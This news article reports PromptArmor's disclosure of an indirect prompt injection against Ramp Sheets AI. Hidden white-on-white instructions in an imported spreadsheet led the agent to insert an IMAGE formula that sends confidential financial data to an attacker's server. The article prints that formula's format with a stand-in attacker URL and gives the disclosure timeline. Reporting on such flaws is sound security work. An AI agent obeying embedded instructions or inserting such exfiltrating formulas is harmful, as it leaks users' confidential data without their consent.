A vulnerability has been discovered in which AI can insert formulas into spreadsheets without authorization and transmit confidential data externally.
AI security firm PromptArmor has reported that
Ramp's Sheets AI Exfiltrates Financials
https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials
Ramp Sheets AI is an agent-based AI function that automatically edits cells and inserts formulas on spreadsheets. It is similar to Claude for Excel , which runs on Excel, but its key feature is that the AI can edit spreadsheet files without the user having to check each time.
According to PromptArmor, the problem stems from the fact that Ramp Sheets AI was able to insert formulas that trigger external communication without user consent. External communication refers to the action of a function within a spreadsheet accessing a server on the internet. If sensitive information is included in the URL, that sensitive information will be sent to the accessed server.
PromptArmor has also posted a blog entry demonstrating the attack. First, the user opens confidential financial information using Ramp Sheets AI.
Next, we will load industry growth rate statistics in a separate tab. We assume that the industry statistics are obtained from external sources such as websites, emails, or shared drives.
The attacker had hidden an 'indirect prompt injection' within a spreadsheet of industry statistics. Indirect prompt injection is an attack that manipulates the behavior of AI by embedding commands in external documents. In the demonstration, the commands were written in white text on a white background, making them difficult for humans to see, but the AI could read them as text within a cell.
The hidden instructions instructed Ramp Sheets AI to collect sensitive data, create formulas for external communication containing that sensitive data, and automatically insert the created formulas into the spreadsheet. When a user requests that the AI 'compare financial models with industry statistics,' Ramp Sheets AI processes the hidden instructions along with the harmless request, inserting a malicious IMAGE function.
The IMAGE function is originally designed to display an image from a specified URL in a table. However, if financial data is appended to the end of the URL, the financial data will be sent to the attacker's server during the image retrieval process.
The inserted formula was in the following format:
[code]=IMAGE('https://attacker.com/visualize.png?{Victim's confidential financial data}')[/code]
Since access logs are recorded on the attacker's server, the attacker can obtain information such as sales and financial indicators simply by viewing the logs. The fact that the user only requested a comparison with industry statistics and did not authorize the data to be sent to an external server makes this particularly dangerous.
PromptArmor reported the vulnerability to Ramp on February 19, 2026, and provided further updates on February 27 and March 13. Ramp acknowledged receipt of the report on March 14 and informed PromptArmor on March 16 that the issue had been resolved.
PromptArmor had also identified a similar risk with Claude for Excel. While Claude for Excel had a human approval process, malicious formulas were not clearly visible on the approval screen, making it difficult to assess the risk. Anthropic has since improved the system to display a red warning screen when inserting formulas that may generate external communications, and to show the full text of the formula being inserted.
Related Posts:
